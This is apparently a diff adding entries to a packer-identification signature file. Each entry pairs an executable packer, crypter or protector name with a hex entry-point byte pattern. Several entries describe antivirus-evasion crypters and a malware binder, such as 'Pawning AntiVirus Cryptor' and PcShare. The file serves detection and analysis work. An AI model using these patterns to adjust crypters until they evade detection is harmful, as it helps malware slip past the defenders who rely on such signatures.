+signature = EB 04 25 80 34 CA E8 29 00 00 00 EB 02 C1 81 EB 01 3A 8B 54 24 0C EB 02 32 92 83 82 B8 00 00 00 22 EB 02 F2 7F 33 C0 EB 04 65 7E 14 79 C3 EB 04 05 AD 7F 45 EB 04 05 65 0B E8 64 67 FF 36 00 00 EB 04 0D F6 A8 7F 64 67 89 26 00 00 EB 04 8D 68 C7 FB EB 01 6B 50 EB 03 8A 0B 93 33 C0 EB 02 28 B9 8B 00 EB 01 04 C3 EB 04 65 B3 54 0A E9 FA 00 00 00 EB 01 A2 E8 D5 FF FF FF EB 02 2B 49 EB 03 7C 3E 76 58 EB 04 B8 94 92 56 EB 01 72 64 67 8F 06 00 00 EB 02 23 72 83 C4 04 EB 02 A9 CB E8 47 26 00 00
+ep_only = true
+
+[Obsidium V1.3.0.0 -> Obsidium Software]
+signature = EB 04 ?? ?? ?? ?? E8 29 00 00 00
+ep_only = true
+
+[Obsidium V1.3.0.0 -> Obsidium Software]
+signature = EB 04 ?? ?? ?? ?? E8 ?? 00 00 00
+ep_only = true
+
+[Obsidium v1.3.0.37 -> Obsidium Software]
+signature = EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 26 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 01 ?? 58 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 ?? ?? ?? E8 23 27
+ep_only = true
+
+[Obsidium v1.3.0.4 -> Obsidium Software]
+signature = EB 02 ?? ?? E8 25 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 01 ?? 33 C0 EB 01
+ep_only = true
+
+[Obsidium v1.3.0.4 -> Obsidium Software]
+signature = EB 02 ?? ?? E8 25 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 01 ?? 33 C0 EB 01 ?? 8B 00 EB 01 ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 58 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 01 ?? E8 3B 26 00 00
+ep_only = true
+
+[Obsidium V1.3.0.4 -> Obsidium Software]
+signature = EB 02 ?? ?? E8 ?? 00 00 00
+ep_only = true
+
+[Obsidium V1.3.0.X -> Obsidium Software]
+signature = EB 03 ?? ?? ?? E8 2E 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B ?? ?? ?? EB 04 ?? ?? ?? ?? 83 ?? ?? ?? ?? ?? ?? EB 01 ?? 33 C0 EB 04 ?? ?? ?? ?? C3
+ep_only = true
+
+[Obsidium V1.3.4.2 -> Obsidium Software]
+signature = EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 24 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 03 ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 01 ?? E8 C3 27 00 00
+ep_only = true
+
+[Obsidium V1.3.5.0 -> Obsidium Software]
+signature = EB 03 ?? ?? ?? E8 ?? ?? ?? ?? EB 02 ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 20 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 04 ?? ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 01 ?? E8 ?? ?? ?? ?? EB 01 ?? EB 02 ?? ?? 58 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 02 ?? ?? 83 C4 04 EB 01 ?? E8
+ep_only = true
+
+[Obsiduim 1.3.0.4 -> Obsiduim Software]
+signature = EB 02 ?? ?? E8 25 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64
+ep_only = true
+
+[ocBat2Exe 1.0 -> OC]
+signature = 55 8B EC B9 08 00 00 00 6A 00 6A 00 49 75 F9 53 56 57 B8 58 3C 40 00 E8 6C FA FF FF 33 C0 55 68 8A 3F 40 00 64 FF 30 64 89 20 6A 00 6A 00 6A 03 6A 00 6A 01 68 00 00 00 80 8D 55 EC 33 C0 E8 81 E9 FF FF 8B 45 EC E8 41 F6 FF FF 50 E8 F3 FA FF FF 8B F8 83 FF FF 0F 84 83 02 00 00 6A 02 6A 00 6A EE 57 E8 FC FA FF FF 6A 00 68 60 99 4F 00 6A 12 68 18 57 40 00 57 E8 E0 FA FF FF 83 3D 60 99 4F 00 12 0F 85 56 02 00 00 8D 45 E4 50 8D 45 E0 BA 18 57 40 00 B9 40 42 0F 00 E8 61 F4 FF FF 8B 45 E0 B9 12 00 00 00 BA 01 00 00 00 E8 3B F6 FF FF 8B 45 E4 8D 55 E8 E8 04 FB ?? ?? ?? ?? E8 B8 58 99 4F 00 E8 67 F3 FF FF 33 C0 A3 60 99 4F 00 8D 45 DC 50 B9 05 00 00 00 BA 01 00 00 00 A1 58 99 4F 00 E8 04 F6 FF FF 8B 45 DC BA A4 3F 40 00 E8 E3 F4 FF FF
+ep_only = false
+
+[Open Source Code Crypter -> p0ke]
+signature = 55 8B EC B9 09 00 00 00 6A 00 6A 00 49 75 F9 53 56 57 B8 34 44 40 00 E8 28 F8 FF FF 33 C0 55 68 9F 47 40 00 64 FF 30 64 89 20 BA B0 47 40 00 B8 1C 67 40 00 E8 07 FD FF FF 8B D8 85 DB 75 07 6A 00 E8 C2 F8 FF FF BA 28 67 40 00 8B C3 8B 0D 1C 67 40 00 E8 F0 E0 FF FF BE 01 00 00 00 B8 2C 68 40 00 E8 E1 F0 FF FF BF 0A 00 00 00 8D 55 EC 8B C6 E8 92 FC FF FF 8B 4D EC B8 2C 68 40 00 BA BC 47 40 00 E8 54 F2 FF FF A1 2C 68 40 00 E8 52 F3 FF FF 8B D0 B8 20 67 40 00 E8 A2 FC FF FF 8B D8 85 DB 0F 84 52 02 00 00 B8 24 67 40 00 8B 15 20 67 40 00 E8 78 F4 FF FF B8 24 67 40 00 E8 7A F3 FF FF 8B D0 8B C3 8B 0D 20 67 40 00 E8 77 E0 FF FF 8D 55 E8 A1 24 67 40 00 E8 42 FD FF FF 8B 55 E8 B8 24 67 40 00
+ep_only = false
+
+[ORiEN V1.X-V2.X -> Fisun A.V.]
+signature = 4F 52 69 45 4E 20 65 78 65 63 75 74 61 62 6C 65 20 66 69 6C 65 73 20 70 72 6F 74 65 63 74 69 6F 6E 20 73 79 73 74 65 6D
+ep_only = false
+
+[ORiEN v2.11 (DEMO)]
+signature = E9 5D 01 00 00 CE D1 CE CE 0D 0A 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 0D 0A 2D 20 4F 52 69 45 4E 20 65 78 65 63 75 74 61 62 6C 65 20 66 69 6C 65 73 20 70 72 6F
+ep_only = true
+
+[ORiEN v2.11 - 2.12 -> Fisun Alexander]
+signature = E9 5D 01 00 00 CE D1 CE ?? 0D 0A 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 0D 0A 2D 20 4F 52 69 45 4E 20 65 78 65 63 75 74 61 62 6C 65 20 66 69 6C 65 73 20 70 72 6F
+ep_only = true
+
+[ORiEN V2.12 -> Fisun A.V.]
+signature = E9 5D 01 00 00 CE D1 CE CD 0D
+ep_only = true
+
+[Pack Master v1.0]
+signature = 60 E8 01 00 00 00 E8 83 C4 04 E8 01 00 00 00 E9 5D 81 ED D3 22 40 00 E8 04 02 00 00 E8 EB 08 EB 02 CD 20 FF 24 24 9A 66 BE 47 46
+ep_only = true
+
+[Pack Master v1.0]
+signature = 60 E8 01 ?? ?? ?? E8 83 C4 04 E8 01 ?? ?? ?? E9 5D 81 ED D3 22 40 ?? E8 04 02 ?? ?? E8 EB 08 EB 02 CD 20 FF 24 24 9A 66 BE 47 46
+ep_only = true
+
+[Packanoid -> Arkanoid]
+signature = BF 00 10 40 00 BE ?? ?? ?? 00 E8 9D 00 00 00 B8
+ep_only = true
+
+[Packanoid 1.0 -> ackanoid]
+signature = BF 00 ?? 40 00 BE ?? ?? ?? 00 E8 9D 00 00 00 B8 ?? ?? ?? 00 8B 30 8B 78 04 BB ?? ?? ?? 00 8B 43 04 91 E3 1F 51 FF D6 56 96 8B 13 8B 02 91 E3 0D 52 51 56 FF D7 5A 89 02 83 C2 04 EB EE 83 C3 08 5E EB DB B9 ?? ?? 00 00 BE 00 ?? ?? 00 EB 01 00 BF ?? ?? ?? 00
+ep_only = true
+
+[Packanoid v1 -> Arkanoid]
+signature = BF ?? ?? ?? ?? BE ?? ?? ?? ?? E8 9D 00 00 00 B8 ?? ?? ?? ?? 8B 30 8B 78 04 BB ?? ?? ?? ?? 8B 43 04 91 E3 1F 51 FF D6 56 96 8B 13 8B 02 91 E3 0D 52 51 56 FF D7 5A 89 02 83 C2 04 EB EE 83 C3 08
+ep_only = true
+
+[Packed with: PKLITE v1.50 with CRC check (1)]
+signature = 1F B4 09 BA ?? ?? CD 21 B8 ?? ?? CD 21
+ep_only = true
+
+[PackItBitch 1.0 -> archphase]
+signature = 00 00 00 00 00 00 00 00 00 00 00 00 28 ?? ?? ?? 35 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C 00 41 ?? ?? ?? 50 ?? ?? ?? 00 00 00 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 ?? ?? ?? ?? ?? ?? ?? 79 ?? ?? ?? 7D ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = false
+
+[PackItBitch V1.0-> archphase]
+signature = 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 ?? 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = false
+
+[Packman 0.0.0.1 -> bubba]
+signature = 60 E8 00 00 00 00 58 8D A8 ?? FE FF FF 8D 98 ?? ?? ?? FF 8D ?? ?? 01 00 00
+ep_only = true
+
+[Packman 0.0.0.1 -> Bubbasoft]
+signature = 0F 85 ?? FF FF FF 8D B3 ?? ?? ?? ?? EB 3D 8B 46 0C 03 C3 50 FF 55 00 56 8B 36 0B F6 75 02 8B F7 03 F3 03 FB EB 1B D1 C1 D1 E9 73 05 0F B7 C9 EB 05 03 CB 8D 49 02 50 51 50 FF 55 04 AB 58 83 C6 04 8B 0E 85 C9 75 DF 5E 83 C6 14 8B 7E 10 85 FF 75 BC 8D 8B 00
+ep_only = false
+
+[Packman v0.0.0.1]
+signature = 60 E8 00 00 00 00 58 8D A8 ?? ?? FF FF 8D 98 ?? ?? ?? FF 8D ?? ?? 01 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00
+ep_only = true
+
+[Packman V0.0.0.1 -> Bubbasoft]
+signature = 60 E8 00 00 00 00 58 8D ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 8D ?? ?? 48
+ep_only = true
+
+[Packman V1.0 -> Brandon LaCombe]
+signature = 60 E8 00 00 00 00 5B 8D 5B C6 01 1B 8B 13 8D 73 14 6A 08 59 01 16 AD 49 75 FA
+ep_only = true
+
+[Packman v1.0 -> Brandon LaCombe]
+signature = 60 E8 00 00 00 00 5B 8D 5B C6 01 1B 8B 13 8D 73 14 6A 08 59 01 16 AD 49 75 FA 8B E8 C6 06 E9 8B 43 0C 89 46 01 6A 04 68 00 10 00 00 FF 73 08 51 FF 55 08 8B
+ep_only = true
+
+[PACKWIN v1.01p]
+signature = 8C C0 FA 8E D0 BC ?? ?? FB 06 0E 1F 2E ?? ?? ?? ?? 8B F1 4E 8B FE 8C DB 2E ?? ?? ?? ?? 8E C3 FD F3 A4 53 B8 ?? ?? 50 CB
+ep_only = true
+
+[PAK-SFX Archive]
+signature = 55 8B EC 83 ?? ?? A1 ?? ?? 2E ?? ?? ?? 2E ?? ?? ?? ?? ?? 8C D7 8E C7 8D ?? ?? BE ?? ?? FC AC 3C 0D
+ep_only = true
+
+[PassEXE v2.0]
+signature = 06 1E 0E 0E 07 1F BE ?? ?? B9 ?? ?? 87 14 81 ?? ?? ?? EB ?? C7 ?? ?? ?? 84 00 87 ?? ?? ?? FB 1F 58 4A
+ep_only = true
+
+[PassLock 2000 v1.0 (Eng) -> Moonlight-Software]
+signature = 55 8B EC 53 56 57 BB 00 50 40 00 66 2E F7 05 34 20 40 00 04 00 0F 85 98 00 00 00 E8 1F 01 00 00 C7 43 60 01 00 00 00 8D 83 E4 01 00 00 50 FF 15 F0 61 40 00 83 EC 44 C7 04 24 44 00 00 00 C7 44 24 2C 00 00 00 00 54 FF 15 E8 61 40 00 B8 0A 00 00 00 F7 44 24
+ep_only = true
+
+[Password Protector (c) MiniSoft 1992]
+signature = 06 0E 0E 07 1F E8 00 00 5B 83 EB 08 BA 27 01 03 D3 E8 3C 02 BA EA
+ep_only = true
+
+[Password protector my SMT]
+signature = E8 ?? ?? ?? ?? 5D 8B FD 81 ?? ?? ?? ?? ?? 81 ?? ?? ?? ?? ?? 83 ?? ?? 89 ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 46 80 ?? ?? 74
+ep_only = true
+
+[PAV.Cryptor (Pawning AntiVirus Cryptor) -> masha_dev]
+signature = 53 56 57 55 BB 2C ?? ?? 70 BE 00 30 00 70 BF 20 ?? ?? 70 80 7B 28 00 75 16 83 3F 00 74 11 8B 17 89 D0 33 D2 89 17 8B E8 FF D5 83 3F 00 75 EF 83 3D 04 30 00 70 00 74 06 FF 15 54 30 00 70 80 7B 28 02 75 0A 83 3E 00 75 05 33 C0 89 43 0C FF 15 1C 30 00 70 80 7B 28 01 76 05 83 3E 00 74 22 8B 43 10 85 C0 74 1B FF 15 14 30 00 70 8B 53 10 8B 42 10 3B 42 04 74 0A 85 C0 74 06 50 E8 8F FA FF FF FF 15 20 30 00 70 80 7B 28 01 75 03 FF 53 24 80 7B 28 00 74 05 E8 35 FF FF FF 83 3B 00 75 17 83 3D 10 ?? ?? 70 00 74 06 FF 15 10 ?? ?? 70 8B 06 50 E8 A9 FA FF FF 8B 03 56 8B F0 8B FB B9 0B 00 00 00 F3 A5 5E E9 73 FF FF FF 5D 5F 5E 5B C3 A3 00 30 00 70 E8 26 FF FF FF C3 90 8F 05 04 30 00 70 E9 E9 FF FF FF C3
+ep_only = false
+
+[PC Guard for Win32 v5.00 -> SofPro/Blagoje Ceklic]
+signature = FC 55 50 E8 00 00 00 00 5D 60 E8 03 00 00 00 83 EB 0E EB 01 0C 58 EB 01 35 40 EB 01 36 FF E0 0B 61 B8 ?? ?? ?? 00 EB 01 E3 60 E8 03 00 00 00 D2 EB 0B 58 EB 01 48 40 EB 01 35 FF E0 E7 61 2B E8 9C EB 01 D5 9D EB 01 0B 58 60 E8 03 00 00 00 83 EB 0E EB 01 0C
+ep_only = true
+
+[PC PE Encryptor Alpha preview]
+signature = 53 51 52 56 57 55 E8 00 00 00 00 5D 8B CD 81 ED 33 30 40 ?? 2B 8D EE 32 40 00 83 E9 0B 89 8D F2 32 40 ?? 80 BD D1 32 40 ?? 01 0F 84
+ep_only = true
+
+[PC Shrinker v0.20]
+signature = E8 E8 01 ?? ?? 60 01 AD B3 27 40 ?? 68
+ep_only = true
+
+[PC Shrinker v0.29]
+signature = ?? BD ?? ?? ?? ?? 01 AD 55 39 40 ?? 8D B5 35 39 40
+ep_only = true
+
+[PC Shrinker v0.45]
+signature = ?? BD ?? ?? ?? ?? 01 AD E3 38 40 ?? FF B5 DF 38 40
+ep_only = true
+
+[PC Shrinker v0.71]
+signature = 9C 60 BD ?? ?? ?? ?? 01 AD 54 3A 40 ?? FF B5 50 3A 40 ?? 6A 40 FF 95 88 3A 40 ?? 50 50 2D ?? ?? ?? ?? 89 85
+ep_only = true
+
+[PC-Guard v3.03d, v3.05d]
+signature = 55 50 E8 ?? ?? ?? ?? 5D EB 01 E3 60 E8 03 ?? ?? ?? D2 EB 0B 58 EB 01 48 40 EB 01
+ep_only = true
+
+[PC-Guard v4.05d, v4.10d, v4.15d]
+signature = FC 55 50 E8 00 00 00 00 5D EB 01
+ep_only = true
+
+[PC-Guard v5.00d]
+signature = FC 55 50 E8 00 00 00 00 5D 60 E8 03 00 00 00 83 EB 0E EB 01 0C 58 EB 01 35 40 EB 01 36 FF E0 0B 61 B8 30 D2 40 00 EB 01 E3 60 E8 03 00 00 00 D2 EB 0B 58 EB 01 48 40 EB 01 35 FF E0 E7 61 2B E8 9C EB 01 D5 9D EB 01 0B 58 60 E8 03 00 00 00 83 EB 0E EB 01 0C
+ep_only = true
+
+[PCPEC "alpha - preview"]
+signature = 53 51 52 56 57 55 E8 00 00 00 00 5D 8B CD 81 ED 33 30 40 00
+ep_only = true
+
+[PCPEC [alpha]]
+signature = 53 51 52 56 57 55 E8 ?? ?? ?? ?? 5D 8B CD 81 ?? ?? ?? ?? ?? 2B ?? ?? ?? ?? ?? 83
+ep_only = true
+
+[PCrypt v3.51]
+signature = 50 43 52 59 50 54 FF 76 33 2E 35 31 00 E9
+ep_only = true
+
+[PcShare ÎļþÀ¦°óÆ÷ v4.0 -> ÎÞ¿É·ÇÒé]
+signature = 55 8B EC 6A FF 68 90 34 40 00 68 B6 28 40 00 64 A1
+ep_only = true
+
+[PCShrink 0.71 beta]
+signature = 01 AD 54 3A 40 00 FF B5 50 3A 40 00 6A 40 FF 95 88 3A 40 00
+ep_only = true
+
+[PCShrink v0.40b]
+signature = 9C 60 BD ?? ?? ?? ?? 01 ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 6A ?? FF ?? ?? ?? ?? ?? 50 50 2D
+ep_only = true
+
+[PE Crypt 1.5 -> BitShape Software]
+signature = 60 E8 00 00 00 00 5D 81 ED 55 20 40 00 B9 7B 09 00 00 8D BD 9D 20 40 00 8B F7 AC ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? AA E2 CC
+ep_only = true
+
+[PE Crypt v1.00/v1.01]
+signature = E8 ?? ?? ?? ?? 5B 83 EB 05 EB 04 52 4E 44 21 EB 02 CD 20 EB
+ep_only = true
+
+[PE Crypt v1.02]
+signature = E8 ?? ?? ?? ?? 5B 83 EB 05 EB 04 52 4E 44
+ep_only = true
+
+[PE Crypt32 (Console v1.0, v1.01, v1.02)]
+signature = E8 00 00 00 00 5B 83 EB 05 EB 04 52 4E 44 21 EB 02 CD 20 EB
+ep_only = true
+
+[PE Crypt32 v1.02]
+signature = E8 00 00 00 00 5B 83 ?? ?? EB ?? 52 4E 44 21
+ep_only = true
+
+[PE Diminisher v0.1]
+signature = 53 51 52 56 57 55 E8 00 00 00 00 5D 8B D5 81 ED A2 30 40 00 2B 95 91 33 40 00 81 EA 0B 00 00 00 89 95 9A 33 40 00 80 BD 99 33 40 00 00 74
+ep_only = true
+
+[PE Diminisher v0.1]
+signature = 5D 8B D5 81 ED A2 30 40 ?? 2B 95 91 33 40 ?? 81 EA 0B ?? ?? ?? 89 95 9A 33 40 ?? 80 BD 99
+ep_only = true
+
+[PE Diminisher V0.1 -> Teraphy]
+signature = 53 51 52 56 57 55 E8 00 00 00 00
+ep_only = true
+
+[PE Diminisher v0.1 -> Teraphy]
+signature = 53 51 52 56 57 55 E8 00 00 00 00 5D 8B D5 81 ED A2 30 40 00 2B 95 91 33 40 00 81 EA 0B 00 00 00 89 95 9A 33 40 00 80 BD 99 33 40 00 00 74 50 E8 02 01 00 00 8B FD 8D 9D 9A 33 40 00 8B 1B 8D 87
+ep_only = true
+
+[PE Encrypt 1.0 -> Liwuyue]
+signature = 55 8B EC 83 C4 D0 53 56 57 8D 75 FC 8B 44 24 30 25 00 00 FF FF 81 38 4D 5A 90 00 74 07 2D 00 10 00 00 EB F1 89 45 FC E8 C8 FF FF FF 2D 0F 05 00 00 89 45 F4 8B 06 8B 40 3C 03 06 8B 40 78 03 06 8B C8 8B 51 20 03 16 8B 59 24 03 1E 89 5D F0 8B 59 1C 03 1E 89 5D EC 8B 41 18 8B C8 49 85 C9 72 5A 41 33 C0 8B D8 C1 E3 02 03 DA 8B 3B 03 3E 81 3F 47 65 74 50 75 40 8B DF 83 C3 04 81 3B 72 6F 63 41 75 33 8B DF 83 C3 08 81 3B 64 64 72 65 75 26 83 C7 0C 66 81 3F 73 73
+ep_only = true
+
+[PE Intro v1.0]
+signature = 8B 04 24 9C 60 E8 ?? ?? ?? ?? 5D 81 ED 0A 45 40 ?? 80 BD 67 44 40 ?? ?? 0F 85 48
+ep_only = true
+
+[PE Lock NT v2.01]
+signature = EB 03 CD 20 EB EB 01 EB 1E EB 01 EB EB 02 CD 20 9C EB 03 CD
+ep_only = true
+
+[PE Lock NT v2.02c]
+signature = EB 02 C7 85 1E EB 03 CD 20 EB EB 01 EB 9C EB 01 EB EB 02 CD
+ep_only = true
+
+[PE Lock NT v2.03]
+signature = EB 02 C7 85 1E EB 03 CD 20 C7 9C EB 02 69 B1 60 EB 02 EB 01
+ep_only = true
+
+[PE Lock NT v2.04]
+signature = EB ?? CD ?? ?? ?? ?? ?? CD ?? ?? ?? ?? ?? EB ?? EB ?? EB ?? EB ?? CD ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 50 C3
+ep_only = true
+
+[PE Lock v1.06]
+signature = 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 4B 45
+ep_only = true
+
+[PE Ninja v1.0 -> +DzA kRAker TNT]
+signature = BE 5B 2A 40 00 BF 35 12 00 00 E8 40 12 00 00 3D 22 83 A3 C6 0F 85 67 0F 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
+ep_only = true
+
+[PE Pack v0.99]
+signature = 60 E8 ?? ?? ?? ?? 5D 83 ED 06 80 BD E0 04 ?? ?? 01 0F 84 F2
+ep_only = true
+
+[PE Packer]
+signature = FC 8B 35 70 01 40 ?? 83 EE 40 6A 40 68 ?? 30 10
+ep_only = true
+
+[PE Password v0.2 SMT/SMF]
+signature = E8 04 ?? ?? ?? 8B EC 5D C3 33 C0 5D 8B FD 81 ED 33 26 40 ?? 81 EF ?? ?? ?? ?? 83 EF 05 89 AD 88 27 40 ?? 8D 9D 07 29 40 ?? 8D B5 62 28 40 ?? 46 80
+ep_only = true
+
+[PE Protect v0.9]
+signature = 52 51 55 57 64 67 A1 30 00 85 C0 78 0D E8 ?? ?? ?? ?? 58 83 C0 07 C6 ?? C3
+ep_only = true
+
+[PE Protect v0.9]
+signature = E9 ?? 00 00 00 0D 0A 0D 0A C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 0D 0A 50 45 2D 50 52 4F 54 45 43 54 20 30 2E 39 20 28 43 29 6F
+ep_only = false
+
+[PE Protector 0.9.3 --> CRYPToCRACk]
+signature = 5B 81 E3 00 FF FF FF 66 81 3B 4D 5A 75 33 8B F3 03 73 3C 81 3E 50 45 00 00 75 26 0F B7 46 18 8B C8 69 C0 AD 0B 00 00 F7 E0 2D AB 5D 41 4B 69 C9 DE C0 00 00 03 C1 75 09 83 EC 04 0F 85 DD 00 00
+ep_only = true
+
+[PE Spin v0.4x]
+signature = EB 01 68 60 E8 00 00 00 00 8B
+ep_only = false
+
+[PE Spin v0.b]
+signature = EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 72 C8 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 26 E8 01 00 00 00 EA 5A 33 C9
+ep_only = true
+
+[PE-Armor 0.46 -> China Cracking Group]
+signature = E8 AA 00 00 00 2D ?? ?? 00 00 00 00 00 00 00 00 00 3D ?? ?? 00 2D ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B ?? ?? 00 5C ?? ?? 00 6F ?? ?? 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 00 00 47 65 74 50 72 6F 63 41
+ep_only = true
+
+[PE-Armor 0.46 -> Hying]
+signature = E8 AA 00 00 00 2D ?? ?? 00 00 00 00 00 00 00 00 00 3D ?? ?? 00 2D ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B ?? ?? 00 5C ?? ?? 00 6F ?? ?? 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41
+ep_only = true
+
+[PE-Armor 0.46 -> Hying]
+signature = E8 AA 00 00 00 2D ?? ?? ?? 00 00 00 00 00 00 00 00 3D
+ep_only = true
+
+[PE-Armor 0.460-0.759 -> hying]
+signature = 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00
+ep_only = false
+
+[PE-Armor 0.49 -> Hying]
+signature = 56 52 51 53 55 E8 15 01 00 00 32 ?? ?? 00 00 00 00 00
+ep_only = true
+
